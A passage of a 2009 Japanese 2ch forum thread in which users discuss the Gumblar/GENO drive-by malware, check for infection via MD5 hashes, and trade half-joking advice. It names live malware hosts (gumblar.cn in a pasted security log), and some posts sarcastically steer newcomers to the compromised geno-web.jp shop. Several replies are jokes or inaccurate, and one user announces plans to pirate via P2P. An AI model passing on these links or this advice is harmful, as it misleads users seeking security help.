少し怖い(セキュリティ的に)と思ったなら今後対策を常に講じれば良いだけです。
それに気がついただけでも良いことだと思いますよ。
133名無しさん@お腹いっぱい。:2009/05/16(土) 06:58:15
小林製薬のページは今でも感染ばら撒いてる最中なの?
もう改善されて感染されちゃったよっていう伝達がされてるの?
134名無しさん@お腹いっぱい。:2009/05/16(土) 06:59:32
>>133
メルマガより


いつも「暮らしのヒントお知らせ隊」メールマガジンをご愛読いただき
誠にありがとうございます。

この度、弊社サイトの一部(「暮らしのヒントお知らせ隊」含む)に
おいて第三者による改ざんが確認され、当該期間に下記サイトを閲覧
された方にウイルス感染の恐れがあることが判明いたしました。

■閲覧により感染した可能性のある期間
 5月10日(日)20時23分 〜 5月11日(月)21時27分

■改ざんされたサイト
 ・暮らしのヒントお知らせ隊
 ・ハナノア ブランドサイト
 ・イージーファイバー ブランドサイト

上記期間に当該サイトにアクセスされた皆様におかれましては、誠に
お手数ではございますが、下記URLにて対応をご確認下さい。

http://www.kobayashi.co.jp/info/090512.html

平素から弊社サイトをご覧いただいている皆様にご迷惑をおかけしま
したこと、心よりお詫び申し上げます。
引き続きサイトの安全管理には万全を尽くしてまいりますので、今後とも
よろしくお願い申し上げます。

135名無しさん@お腹いっぱい。:2009/05/16(土) 07:00:50
>>130
表示されないので謎
136名無しさん@お腹いっぱい。:2009/05/16(土) 07:02:35
UAC切ってたvistaってやばいよね…?
137名無しさん@お腹いっぱい。:2009/05/16(土) 07:03:34
>>134
ありがとう
対応されてるみたいだな
っつーか一応有名企業なのに誰か報道してくれんのか
138名無しさん@お腹いっぱい。:2009/05/16(土) 07:04:17
>>129
意味がわからなければ半年romれ
139名無しさん@お腹いっぱい。:2009/05/16(土) 07:05:14
>>138
ROMったらウィルス感染しちゃうわ
140名無しさん@お腹いっぱい。:2009/05/16(土) 07:05:17
感染してる人ってしてない人より楽観的だよね
141名無しさん@お腹いっぱい。:2009/05/16(土) 07:05:30
だから感染するんだよな
142名無しさん@お腹いっぱい。:2009/05/16(土) 07:05:32
前スレ816
 816 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2009/05/16(土) 03:13:52
 >>806 ぐぐったらこんなんでました
 ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1020068155


あれ?リンク先・・・日付が・・・
それとこの一文

>ブラウザの一時ファイルを削除することで、ウイルスが駆除できるでしょう。

まさかgenoはこれを見て・・・
143名無しさん@お腹いっぱい。:2009/05/16(土) 07:07:13
>>135
ていうかNTTのくせになにやってるんだろうね
144名無しさん@お腹いっぱい。:2009/05/16(土) 07:08:20
>>142
GENOってパソコン関係のショップなんでしょ?
ありえない…
145名無しさん@お腹いっぱい。:2009/05/16(土) 07:08:37
>>138
ROMっているだけで感染するんだが
146名無しさん@お腹いっぱい。:2009/05/16(土) 07:08:49
>>139
テンプレをちゃんと見ればわかるだろ
わからなければわからない自分を呪え
147名無しさん@お腹いっぱい。:2009/05/16(土) 07:09:55
危険なIPをルーターで全部フィルタリングした
一括登録できないからマジ疲れた…寝る
148名無しさん@お腹いっぱい。:2009/05/16(土) 07:10:09
sqlsodbc.chm ってXPだけのファイル?
149名無しさん@お腹いっぱい。:2009/05/16(土) 07:10:17
わからないなら違う方法で確認すりゃいいのに
150名無しさん@お腹いっぱい。:2009/05/16(土) 07:11:10
>>41
確認しようとぐぐったけど さっぱりわからんかったw
151名無しさん@お腹いっぱい。:2009/05/16(土) 07:11:41
>>129
MD5は該当ファイルの中身を関数で計算し値を出力する。
同じファイルで計算すると同じ値になる。

*現状の*では既存ファイルの中身を書き換える。
だからMD5の値を比較すれば書きらえたかどうかが分かる。
152名無しさん@お腹いっぱい。:2009/05/16(土) 07:11:55
改めてJavascript切ることの重要性がわかったわ
でも最近の公式サイトとかはJavascript、Flash使いまくりだからな〜
めんどうなんでほとんどWikipediaで済ましてるわ
153名無しさん@お腹いっぱい。:2009/05/16(土) 07:12:44
>>152
なんであんなにフラッシュ使うんだろうね
15494:2009/05/16(土) 07:13:05
>>129
今のところ、感染したPCのファイルの一部が ウィルス作者に都合がいいように書き換えられるんだけど、
そんな違いが初心者にわかるわけないだろ?

もっと簡単に、
君のPCが、ウィルスに感染していない(書き換えられていないファイル) だと判断するには、
書き換えられていない正常なファイルと比較して一致すれば良い。

だが、一致しているかを判断するのも大変そうだから、ツールを使って調べるわけ。
MD5ってのはファイルの指紋みたいなもので、
正常なファイルの指紋と 君のPCの同じ名前のファイル の指紋が一致すれば
多分感染していなそうだ・・・という推測が成り立つ(感染した全部PCのファイル書き換えるとは言い切れないため)。

反対に感染しているファイルの指紋と 一致しちゃったら、100パーセント 感染しているってこと。
その指紋を取るソフトが>>124とか>>127なわけ。
155名無しさん@お腹いっぱい。:2009/05/16(土) 07:13:43
みんなおはよう
ちなみに、Firefox系のブラウザでGoogle検索しただけで、感染したサイトが一番上ならGoogleの検索結果開いただけで感染する可能性あり。
Googleの先読み機能が影響してるので怖い方はabout:configからnetwork.prefetch-nextをfalseにすること推奨
156名無しさん@お腹いっぱい。:2009/05/16(土) 07:13:43
>>148
Windows2000以外には存在する。
157名無しさん@お腹いっぱい。:2009/05/16(土) 07:15:03
MD5云々は最終結論だとして、
sqlsodbcのファイルサイズを偽装したウイルスは確認されてるの?
158名無しさん@お腹いっぱい。:2009/05/16(土) 07:15:04
>>153
制作会社がうまーなのかな
159名無しさん@お腹いっぱい。:2009/05/16(土) 07:16:02
>>156
Meにも存在する?
160名無しさん@お腹いっぱい。:2009/05/16(土) 07:16:30
>>155
Google以外の検索サイトは先読みしないんですかね?
161名無しさん@お腹いっぱい。:2009/05/16(土) 07:17:01
アドバイス宜しくお願いします。

【OS】XP SP3
【使用セキュリティソフト】ウイルスバスター2009
【疑った理由】
セキュリティログを見てたらこんなログがでてた(その時間は嫁が使ってた。)
そのあとどんな処理をしたかは覚えていないらしい。

"フィッシング詐欺対策" "2009/05/08"
"時間" "URLアドレス" "偽装サイトブロック (ホスト名変換)" "脅威"
"15:55" "http://gumblar.cn/rss/?id=5718066" "" "このWebサイトは安全でない可能性があります。
                             このWebサイトにはスパイウェアや不正プログラムが存在しているか、
                             またはこのWebサイトは偽のWebサイトか、
                             安全性が非常に低いと評価されているWebサイトです。"
"15:56" "http://gumblar.cn/rss/?id=5718066" "" "このWebサイトは安全でない可能性があります。
このWebサイトにはスパイウェアや不正プログラムが存在しているか、
またはこのWebサイトは偽のWebサイトか、
安全性が非常に低いと評価されているWebサイトです。"

【症状】
今のところ自覚症状なし
【確認手段】
sqlsodbc.chmのサイズ,MD5チェック、カスペオンラインスキャン、バスターウィルススキャン
cmd.exe、regedit.exeの起動チェック、特定サイトのアクセスチェック
ttp://www3.atword.jp/gnome/を参考にレジストリチェック
【結果】
sqlsodbc.chmのサイズ、MD5共に問題なし。cmd.exe、regedit.exeの起動OK。CPU、メモリ使用率も問題なし。CPU、メモリ使用率も問題なし。
カスペオンラインスキャン何も検知せず。レジストリも問題なし。
バスターウィルススキャンスパイウェアは検知したが、全てクッキーにある奴だけ。ウィルスは検知していない。

この結果でほぼ感染していないと思ってますが、皆様の助言を頂きたく書込みしました。
その他チェック項目等がありましたらご指導ください。
162名無しさん@お腹いっぱい。:2009/05/16(土) 07:17:35
心配なら一週間回線切って寝ろ
163名無しさん@お腹いっぱい。:2009/05/16(土) 07:17:49
>>154
129じゃないんだが、その指紋にあたるのがバイト数ってことですか?
16494 101 154:2009/05/16(土) 07:18:02
つづき。
>>129
そのファイルの場所が>>7
指紋の値が>>6
だが、>>4の最後に
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
とあるので、これで大丈夫だから感染していない! とは言い切れないわけ。
あくまで黒を特定する為の手段。
165名無しさん@お腹いっぱい。:2009/05/16(土) 07:18:37
>>158
わざわざ重たいサイトつくって金もらうのね
166名無しさん@お腹いっぱい。:2009/05/16(土) 07:19:38
>>165
特にゲーム会社のHPってトップページからフラッシュで重すぎるから
リンク貼られていても飛ばないようにしているわ・・・
見れるまで1分かかるとかイライラする
167名無しさん@お腹いっぱい。:2009/05/16(土) 07:19:49
>>160
してないと思う

>>162
問題なし
あとhttp://のところはhXXp://とかにしろ
168名無しさん@お腹いっぱい。:2009/05/16(土) 07:19:50
>>164
トン
わかりやすかった
169名無しさん@お腹いっぱい。:2009/05/16(土) 07:19:58
Adobe Reader Speed-Upってどこで手に入るの?
170名無しさん@お腹いっぱい。:2009/05/16(土) 07:20:35
前スレの>>216これか・・・

111 名前:GENO[sage] 投稿日:2009/05/16(土) 00:04:18 ID:Fd0/+V3h0
バイオハザードと戦国ゲームを扱っているサイトで感染確認

数日前に行った時はAVAST!が怒るくらいで済んだが次に行ったらAVAST!が激怒
もしかしたら新種か亜種か何かにここ数日で進化したか?
怒る→警告とこのサイトの通信遮断するところクリック
激怒→ウィルスをチェスト送り推奨で今現在チェストに放り込まれてる
ただ放り込まれているのはキャッシュなので過剰反応かもしれん
因みに火狐+JSカットで隔離までいったw

とりあえず最初にいった時にウィルスの報告したんだけど対応していないソフトで
検査したらしく管理人さんは大丈夫って思っている
次にいった時はAVAST!激怒したので報告むりぽ
171名無しさん@お腹いっぱい。:2009/05/16(土) 07:20:35
>>161
大丈夫だとおもいます
ですが実際見ているわけじゃないので

精神的に不安ならばクリーンインスコ
大丈夫そうならそのままで
172167:2009/05/16(土) 07:20:49
安価ミス
×>>162
>>161
173名無しさん@お腹いっぱい。:2009/05/16(土) 07:21:00
エロゲー公式サイトとかは切ってても大丈夫なとこが多い
174名無しさん@お腹いっぱい。:2009/05/16(土) 07:21:29
>>165
取引として考える一つの指標として
命令文・タグ、がいくつ存在するかってのがある
タグ打ちよりもFlashの方が命令文が多いのならば
そっちの方が金になるってことでFlashを使うってのもあるかもしれない
175名無しさん@お腹いっぱい。:2009/05/16(土) 07:22:00
>>166
どんだけ遅い回線だよ
176名無しさん@お腹いっぱい。:2009/05/16(土) 07:22:57
WindowsMe使っているんだが、C:\WINDOWS\system32 に sqlsodbc.chm ってファイル無いんだが?
177名無しさん@お腹いっぱい。:2009/05/16(土) 07:23:08
金儲けに走ると悪いことが起きるってばっちゃが
178名無しさん@お腹いっぱい。:2009/05/16(土) 07:23:36
もうMeはお呼びじゃない
使うならオフライン専用で
179161:2009/05/16(土) 07:24:08
直リンすみませんでした。

>>167
ご回答有難うございます。
問題なさそうなので、安心して眠れます。
18094 101 154:2009/05/16(土) 07:24:29
>>163
>>164に書いたとおり、指紋の値がMD5の値。
バイト数は、指紋にはならない。
バイト数(ファイルサイズ)なんて、不要なデータを追加すれば、いくらでも変えられるじゃん。
181名無しさん@お腹いっぱい。:2009/05/16(土) 07:26:50
>>159
Meにはデフォルトではchmはいっていませんが、他ソフト導入や更新をすると入るようです
182名無しさん@お腹いっぱい。:2009/05/16(土) 07:29:02
同人のスレ見てたらwin98の人もいた・・・
183名無しさん@お腹いっぱい。:2009/05/16(土) 07:30:07
疎い人なら今もふらふらネットサーフィンしてるんだろな
ちょっと挙動がおかしくても気にしなかったり
なんでもOK押したりさ・・・
184名無しさん@お腹いっぱい。:2009/05/16(土) 07:31:53
そういう時期がわたしにもありました。
185名無しさん@お腹いっぱい。:2009/05/16(土) 07:32:08
挙動がおかしくても、Win98だからかな、古いPCだからかな
程度で済んでしまうのかもしれないな
186名無しさん@お腹いっぱい。:2009/05/16(土) 07:32:48
同人系ってPCの買い替えサイクルすっげ速そうなイメージあったのに
そうでもないのかね
Macとりなくすのユーザーがのほほんしててうらやましい・・・
187名無しさん@お腹いっぱい。:2009/05/16(土) 07:34:37
こんな時だけだよな「Linux使ってて良かった」って思うのは
188名無しさん@お腹いっぱい。:2009/05/16(土) 07:34:40
質問しに来ました
もし自分のサイトにスクリプト埋め込まれた場合、セキュリティソフトは警告出しますか?
189名無しさん@お腹いっぱい。:2009/05/16(土) 07:34:54
というかWin98だとウイルスきかなそうなイメージがあるんだが
古すぎて
そんな事はないんだよなあ
190名無しさん@お腹いっぱい。:2009/05/16(土) 07:35:31
これ結構酷いウイルスみたいだけど、ニュー速にスレないんだな
191名無しさん@お腹いっぱい。:2009/05/16(土) 07:35:50
同人なんて貧乏なんだから、未だに98とかMeとか使っているよ
動画サイトとかネトゲしなきゃ、普通にHPとかブログ読めるし
192名無しさん@お腹いっぱい。:2009/05/16(土) 07:36:14
自作板住人だったのでGENO騒動早めに知って良かった
193名無しさん@お腹いっぱい。:2009/05/16(土) 07:36:21
>>188
出るならこんなに広がってない
194名無しさん@お腹いっぱい。:2009/05/16(土) 07:36:44
>>182
98やMeだと、そもそもFlash9までしか対応してない
恐ろしや…
195名無しさん@お腹いっぱい。:2009/05/16(土) 07:37:13
>>188
使っているソフトによりますが、難しいでしょう。
196名無しさん@お腹いっぱい。:2009/05/16(土) 07:37:30
>>193
じゃあ自分で感染してるのは気づかないんですね
自分のパソコンからソース見てもみえないのかな...
197名無しさん@お腹いっぱい。:2009/05/16(土) 07:37:32
>>194
adobeのアクロバット・リーダーも最新バージョンは対応してないから
pdf文書とかも読めない場合がある・・・
198名無しさん@お腹いっぱい。:2009/05/16(土) 07:38:22
ところで、同人スレってどこのスレのこと?
199名無しさん@お腹いっぱい。:2009/05/16(土) 07:39:01
>>198
【管理も】同人サイト・GENOウィルス注意【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242391122/
200名無しさん@お腹いっぱい。:2009/05/16(土) 07:39:26
>>198
【管理も】同人サイト・GENOウィルス注意【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242391122/l50
201名無しさん@お腹いっぱい。:2009/05/16(土) 07:39:55
テレビはエコポイントとインフルの話題ばかり
1分でいいからウィルスの話題をたのむ
202名無しさん@お腹いっぱい。:2009/05/16(土) 07:41:51
ボットネットの一部となり、加害者になって、警察が来るなんて考えもしてない。
「だってわかんないんだもん」で済むと思っているだろうし・・・。
ウィルスとはよく言ったものだ。

お前らも豚の媒介者とならんように、マスクと手洗いウガイはしてくれよ。

http://www3.atword.jp/gnome/
記事が更新されてる。
俺がこの人だったら、イワンこっちゃない って心底思っているだろうな。
感染したサイトに警告メールを出していたみたいだけど・・・
203名無しさん@お腹いっぱい。:2009/05/16(土) 07:42:31
総被害額どれくらいになるんだろうか
204名無しさん@お腹いっぱい。:2009/05/16(土) 07:42:34
>>187
信頼できるのは余剰パーツで組んだUbuntuマシンだけだぜ…
205名無しさん@お腹いっぱい。:2009/05/16(土) 07:44:03
今IEでみてんだけどさ
Jane styleでみたほうが安全なんだよね。
デスクトップになぜかそのアイコンあるけど。
使ったことないんだよな。
206名無しさん@お腹いっぱい。:2009/05/16(土) 07:45:21
感染サイト踏みそうになってから不安でたまらない
再起動できたしハッシュも大丈夫だし
ウィルスチェックもしたけど気持ちがもやもやする
いやなウィルスだなぁ
207名無しさん@お腹いっぱい。:2009/05/16(土) 07:48:26
というか、違法な割れサイトとかゲームソフト違法DLサイトとか
アダルト関係のサイトじゃなくて、一般のまともなサイトを閲覧しただけで
exeファイルを実行とかしなくても感染するって、今回が初めてじゃない?
208名無しさん@お腹いっぱい。:2009/05/16(土) 07:49:16
・・・。
209名無しさん@お腹いっぱい。:2009/05/16(土) 07:50:21
前にMSのサイトが改ざんされてウイルス撒かれたのはなんてウイルスだっけか?
210名無しさん@お腹いっぱい。:2009/05/16(土) 07:50:54
WinnyとかShareみたいなP2P使わなければ安全だと思ってたのに・・・
まさか、実行ファイルじゃなくて、ただHP見ただけで感染するとか・・・
211名無しさん@お腹いっぱい。:2009/05/16(土) 07:52:00
>>207
そんな事は無い。昔からあった。
ただ今回は手法が少しだけちがった。
212名無しさん@お腹いっぱい。:2009/05/16(土) 07:52:05
サイト見ただけで感染するウィルスなんか
今までいくらでもあっただろ…
どんだけ油断してんだよ…
213名無しさん@お腹いっぱい。:2009/05/16(土) 07:52:58
カスペをダウンロードしたけどスキャンの仕方が分かりません
何度もインストールしますかと出てしまいます
ニフティも何度も使用しているパソコンの環境についての画面になってスキャンできません
何がいけないので出来たら助言お願いします
214名無しさん@お腹いっぱい。:2009/05/16(土) 07:53:36
ちょっと聞きにくいんだけど同人ってどういう意味?
215名無しさん@お腹いっぱい。:2009/05/16(土) 07:53:50
つオンラインスキャン
216名無しさん@お腹いっぱい。:2009/05/16(土) 07:53:56
http://image.itmedia.co.jp/l/im/news/articles/0905/15/l_malware.jpg
これだよな?

>>207
>>210
それは10年前の話。
今回の手口も、これまでに何度も使われてきたやり方。
5年前の記事でも読め。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041104/152149/
217名無しさん@お腹いっぱい。:2009/05/16(土) 07:54:47
>>214
http://ja.wikipedia.org/wiki/%E5%90%8C%E4%BA%BA
同人(どうじん)とは、同じ趣味や志をもった人、仲間ないし集団のことである。
218名無しさん@お腹いっぱい。:2009/05/16(土) 07:55:11
>>213
カスペじゃ削除できん
avastをブート時に起動させるんだ!
やり方は知らん、勝手にavastがやった
219名無しさん@お腹いっぱい。:2009/05/16(土) 07:55:51
>>218
Meの場合、avastのブートタイム検査は出来ない
220名無しさん@お腹いっぱい。:2009/05/16(土) 07:56:24
ブートってなに?
221名無しさん@お腹いっぱい。:2009/05/16(土) 07:56:43
だめだこりゃ
222名無しさん@お腹いっぱい。:2009/05/16(土) 07:56:57
>>217
逆に判りづらい説明してやんなよww
223名無しさん@お腹いっぱい。:2009/05/16(土) 07:57:06
ところでClamwinの対応マダー
224214:2009/05/16(土) 07:57:17
>>217
よくわかりました どうも
225名無しさん@お腹いっぱい。:2009/05/16(土) 07:57:21
>>214
同じ趣味、指向性をもった人ってところか。
226名無しさん@お腹いっぱい。:2009/05/16(土) 07:57:40
>>220
http://ja.wikipedia.org/wiki/%E3%83%96%E3%83%BC%E3%83%88
ブート(またはブートストラップ、boot、bootstrap)は、コンピュータシステムの電源を入れたときに
オペレーティングシステムを起動するまでの処理の流れをいう。また、ブートローダ(boot loader)とは、ブート処理を行うソフトウェアを意味する。

少しはwikiれ
227名無しさん@お腹いっぱい。:2009/05/16(土) 07:57:42
>>219
更新の止まってるOSでサイトを見るのに使うなよ
まわりへ嫌がらせになるだけじゃん
228名無しさん@お腹いっぱい。:2009/05/16(土) 07:58:09
>>202
>ある状況によっては、MIME-sniffingとして知られたプロセスを通し、Internet Explororブラウザは
>html と同様に、この image fileを実行してしまいます。このことは、ブービートラップのように
>埋め込まれたイメージの中のスクリプトを実行してしまうことを意味しています。

…えーと、IEは画像ファイルからも感染するってこと?
229214:2009/05/16(土) 07:58:29
>>225
ありがとう
230名無しさん@お腹いっぱい。:2009/05/16(土) 07:58:50
>>227
だって、Meの入ったPCしか無いんだもん・・・
231名無しさん@お腹いっぱい。:2009/05/16(土) 08:00:28
知るかそんなの
PC買う金がないなら働くか携帯でも使ってろ
232名無しさん@お腹いっぱい。:2009/05/16(土) 08:00:31
>>218
自分で確認できた範囲では感染はしてないんですがスキャンできない以上怖いので
クリーンインストールしようと思います。
その後にアンチウイルスソフトが必要らしいんですが、ウイルスバスター2009では駄目ですか?
スレでバスターも挙げられてたのを見かけたんですが
233名無しさん@お腹いっぱい。:2009/05/16(土) 08:01:03
>>190
何度か立ったけど、300前後でいつもdat落ち
さすがノーガード戦法のメッカ
234名無しさん@お腹いっぱい。:2009/05/16(土) 08:02:06
>>230
こうやってボットネットが少なくならない原因になってるんですねぇ
235名無しさん@お腹いっぱい。:2009/05/16(土) 08:03:07
RO
       、--‐冖'⌒ ̄ ̄`ー-、
     /⌒`         三ミヽー-ヘ,_
   __,{ ;;,,             ミミ   i ´Z,
   ゝ   ''〃//,,,      ,,..`ミミ、_ノリ}j; f彡
  _)        〃///, ,;彡'rffッ、ィ彡'ノ从iノ彡
  >';;,,       ノ丿川j !川|;  :.`7ラ公 '>了
 _く彡川f゙ノ'ノノ ノ_ノノノイシノ| }.: '〈八ミ、、;.)
  ヽ.:.:.:.:.:.;=、彡/‐-ニ''_ー<、{_,ノ -一ヾ`~;.;.;)
  く .:.:.:.:.:!ハ.Yイ  ぇ'无テ,`ヽ}}}ィt于 `|ィ"~
   ):.:.:.:.:|.Y }: :!    `二´/' ; |丶ニ  ノノ
    ) :.: ト、リ: :!ヾ:、   丶 ; | ゙  イ:}    逆に考えるんだ
   { .:.: l {: : }  `    ,.__(__,}   /ノ
    ヽ !  `'゙!       ,.,,.`三'゙、,_  /´   「98やMeはPCではない」
    ,/´{  ミ l    /゙,:-…-〜、 ) |
  ,r{   \ ミ  \   `' '≡≡' " ノ       と考えるんだ
__ノ  ヽ   \  ヽ\    彡  ,イ_
      \   \ ヽ 丶.     ノ!|ヽ`ヽ、
         \   \ヽ `¨¨¨¨´/ |l ト、 `'ー-、__
            \  `'ー-、  // /:.:.}       `'ー、_
          `、\   /⌒ヽ  /!:.:.|
          `、 \ /ヽLf___ハ/  {
              ′ / ! ヽ
236名無しさん@お腹いっぱい。:2009/05/16(土) 08:03:59
>>231
買う金はあるよ
今、電気店へ行ったりして物色中
何を買えば良いか迷ってる

予算は7万くらいで、現在ノートPCしか持ってないので
デスクトップ型ならモニターも買わなきゃいけない
とりあえず、OSはXPにすべきかVISTAにすべきか、7にすべきか
後、プリインストールされた本体を買うべきか、別個に買って自分でインストールすべきか・・・

色々と悩むんだな
237名無しさん@お腹いっぱい。:2009/05/16(土) 08:04:33
>>230
朝っぱらから萌えたw
238名無しさん@お腹いっぱい。:2009/05/16(土) 08:04:43
>>235
PCではない……つまりMacということか!
239名無しさん@お腹いっぱい。:2009/05/16(土) 08:04:49
まったく初心者ですが、とりあえず何をしたら感染してるかわかります?
1読んでもよくわかりません
あと感染してたらLANで繋がったPCも全部ヤバいですかね?
240名無しさん@お腹いっぱい。:2009/05/16(土) 08:05:16
前からネットに接続しただけで感染するウイルスとかあったじゃん
241名無しさん@お腹いっぱい。:2009/05/16(土) 08:05:29
>>236
クレカ情報が抜かれるんですね判ります
242名無しさん@お腹いっぱい。:2009/05/16(土) 08:05:31
テンプレ全部読めよ
243214:2009/05/16(土) 08:05:38
>>232
だめ
ウイルスバスターはこういうのの対応遅い
244名無しさん@お腹いっぱい。:2009/05/16(土) 08:06:07
チラシの裏に書け
245名無しさん@お腹いっぱい。:2009/05/16(土) 08:06:35
>>236
8000円の中古PCで十分。
246名無しさん@お腹いっぱい。:2009/05/16(土) 08:06:54
>>239
PC全部窓から投げすればおk
247名無しさん@お腹いっぱい。:2009/05/16(土) 08:07:02
>>245
じゃあ、今のMeで十分だろ
248名無しさん@お腹いっぱい。:2009/05/16(土) 08:07:04
>>239
読む気も理解する気もないだろ
249名無しさん@お腹いっぱい。:2009/05/16(土) 08:07:10
クリーンインストールってメーカー製のパソコンじゃできないんですか?
250名無しさん@お腹いっぱい。:2009/05/16(土) 08:07:24
>>230
こういうの見てると
やっぱりネット接続は免許制度と車検制度(PC検?)みたいなの導入すべきだよなあとつくづく思う
前スレだかに5年くらいしか使ってないのに新しいの買えるかって言ってる輩がいて
そのときもやはり同じ事思った
251名無しさん@お腹いっぱい。:2009/05/16(土) 08:07:44
>>239
インターネットしたら感染する
LANケーブルで繋がったPC、プリンタ、ルータはヤバイ
252名無しさん@お腹いっぱい。:2009/05/16(土) 08:07:56
>>249
少しは自分で調べろ
253名無しさん@お腹いっぱい。:2009/05/16(土) 08:07:58
>>247
問題はサポートが続いてるOSを使う事が第一であって速度は二の次だ
254名無しさん@お腹いっぱい。:2009/05/16(土) 08:09:08
>>249
そのぐらいもわからないならメーカーに電話してこい。
ここより親切に対応してくれるぞ。
255名無しさん@お腹いっぱい。:2009/05/16(土) 08:09:13
PC買い換えるなら要らなくなったPCくれよ
256名無しさん@お腹いっぱい。:2009/05/16(土) 08:09:15
>>253
8千円でサポート続いているOSの入った中古PC買えるのか?
257名無しさん@お腹いっぱい。:2009/05/16(土) 08:09:18
>>249
ググレ
258名無しさん@お腹いっぱい。:2009/05/16(土) 08:09:36
>>240
ネットに繋ぐ「だけ」で感染するブラスターとかあったなあ…
259名無しさん@お腹いっぱい。:2009/05/16(土) 08:09:45
>>239
読んでないだろ
100回読んでもどうしてもわからないなら同人板の方のwiki行け
同人の方の場所がわからないとか言うなよ、抽出しろ
260名無しさん@お腹いっぱい。:2009/05/16(土) 08:09:46
いい加減スレチ
261名無しさん@お腹いっぱい。:2009/05/16(土) 08:09:50
>>243
レスありがとうございます
カスペはインストールしたんですがkis8ってフォルダの中にあるsetupを開こうとすると
「インストールのログファイルを開くときにエラーが発生しました。指定されたログファイルの場所が存在し、
書き込み可能であることを確認してください。」と出てスキャンできないんですが
何がいけないんでしょうか。
262名無しさん@お腹いっぱい。:2009/05/16(土) 08:10:50
>>256
XPの初期のがごろごろ出てる
なんだかんだいっても出てから8年だからなXPは
263名無しさん@お腹いっぱい。:2009/05/16(土) 08:10:59
>>255
要らなくなったPCは、P2P用にするつもり
一度、WinnyとかShareってやってみたかったんだ
でも、個人情報流出とか怖いんで、専用PC持ってない状態じゃすべきじゃないと思っててね
もし、新しいPC買ったら、古いMeの入ったPCはP2P専用マシンになる予定
264名無しさん@お腹いっぱい。:2009/05/16(土) 08:11:47
>>256
XP PRO PEN4 搭載がごろごろあるっつーの。
265名無しさん@お腹いっぱい。:2009/05/16(土) 08:12:02
>>256
2kのなら買えるかもな
266名無しさん@お腹いっぱい。:2009/05/16(土) 08:12:08
>>263
延々とウイルスにかかるわけですね
267名無しさん@お腹いっぱい。:2009/05/16(土) 08:12:27
>>263
ダウンロードも違法扱いになったの知ってるか?
268名無しさん@お腹いっぱい。:2009/05/16(土) 08:12:36
>>264
本体だけ?ノート?
本当に8000円でXPインストール済み?
269名無しさん@お腹いっぱい。:2009/05/16(土) 08:14:25
>>263
セキュ板で割れ宣言するヤツがいるなんて・・・
270名無しさん@お腹いっぱい。:2009/05/16(土) 08:14:51
>>268
この店安いから探してみ

http://www.geno-web.jp/
271名無しさん@お腹いっぱい。:2009/05/16(土) 08:14:53
>>268
スリムタワーが多いかな5000円ぐらいからが多い
ノートだと10000円からかな
27294 101 154:2009/05/16(土) 08:15:01
>>250
じつは同じヤツだと思うよ。
そのPCでクレジットカード使ってみろって話。
それが嫌で、危険だと分かるなら、ネットにつなぐなって、そう思うよな。

>>261
多分、ディレクトリに日本語が混ざっている。
ドライブのルートでやってみれ。

>>228
そのサイトの人は、そう書いているね。
IE7以前だと、そう(ヤバイ)みたいだね。
IE8では対策されているみたい。

いずれにしても、これまでにあがったような対策をしなきゃならん。
273214:2009/05/16(土) 08:15:01
>>261
最初インストールする時にセットアップするファイルを解凍してできるのがkis8フォルダで
インストール先は変えてなければC:\Program Files\Kaspersky Labです

インストールができたらkis8フォルダはもう要らないので捨てていいよ
274名無しさん@お腹いっぱい。:2009/05/16(土) 08:15:18
>>263は釣りだろ
こやつめははは
275名無しさん@お腹いっぱい。:2009/05/16(土) 08:15:34
>>270
らめぇえぇぇっぇぇえ
276名無しさん@お腹いっぱい。:2009/05/16(土) 08:16:15
>>270
>>268じゃないけどありがとうw
277名無しさん@お腹いっぱい。:2009/05/16(土) 08:16:43
>>270
http://www.geno-web.jp/

本当に、安いね
278名無しさん@お腹いっぱい。:2009/05/16(土) 08:16:44
>>263
残念 (^^;
279名無しさん@お腹いっぱい。:2009/05/16(土) 08:18:27
GenoウイルスのスレでGenoのサイト勧めるとかww
280名無しさん@お腹いっぱい。:2009/05/16(土) 08:18:34
>>268
デスクトップは本体だけで8000円
15モニタ付きなら12000円
ノートなら2万
どれも4年から5年落ち
初心者はリカバリCD付き買いなよ。
281名無しさん@お腹いっぱい。:2009/05/16(土) 08:19:17
★3まで超マッタリだったのに一昨日からのこの加速ぶりはなんなんだ・・・
282名無しさん@お腹いっぱい。:2009/05/16(土) 08:19:19
ウイルス入りだから安いんだろ
283名無しさん@お腹いっぱい。:2009/05/16(土) 08:20:25
何このGENOマッチポンプ商法
284名無しさん@お腹いっぱい。:2009/05/16(土) 08:20:46
http://www.geno-web.jp/Goods/GB09002150.html
【良品中古】 DELL OPTIPLEX GX60 [OPTIPLEX GX60]
(Cel 2.40GHz/ 512MB/ 40GB/ DVD-ROM/ WinXP ProリカバリCD付き)

[販売価格] 7,999 円
これで良いじゃん
285名無しさん@お腹いっぱい。:2009/05/16(土) 08:20:55
>>281
同人板の腐女子連中が流入してきた
286名無しさん@お腹いっぱい。:2009/05/16(土) 08:20:57
安物買いの銭失いになりかねんわ
287名無しさん@お腹いっぱい。:2009/05/16(土) 08:21:20
>>281
同人スレから流れてきてるんじゃね
288名無しさん@お腹いっぱい。:2009/05/16(土) 08:21:43
>>284
ウイルスもプリインストールされてるんだろ?
289名無しさん@お腹いっぱい。:2009/05/16(土) 08:22:30
>>268
使い捨てPCっていいぞ。
290名無しさん@お腹いっぱい。:2009/05/16(土) 08:22:56
そういやアンチウィルスソフトも安売りしてたよね
291名無しさん@お腹いっぱい。:2009/05/16(土) 08:24:36
>>284
企業の払い下げとはいえ、十分使えるスペックのマシンがゴミのような値段とは、恐ろしい世の中だ
292名無しさん@お腹いっぱい。:2009/05/16(土) 08:25:48
次スレいらないね
29394 101 154:2009/05/16(土) 08:26:10
http://www.itmedia.co.jp/enterprise/articles/0905/14/news020.html
偽フラッシュのインストールを促すらしいぞ。
みんな気をつけろよ。
294名無しさん@お腹いっぱい。:2009/05/16(土) 08:26:23
>>284
このPCショップは信用できるのか?
HPにウイルス仕込まれているようなところだろ?

やっぱ、買うならソフマップとかで買いたいわ
アフターケアも何も無いような弱小の中古PC屋だと
使い捨てのサブPCなら良いけど、メインとして使うには怖い
295名無しさん@お腹いっぱい。:2009/05/16(土) 08:26:56
>>272
すみませんドライブからルート検索するってどうやるんですか。

>>273
ファイル名を指定して実行したらたくさんファイルが出てきたんですが、
カスペらしき名前のファイルが見当たりませんでした。
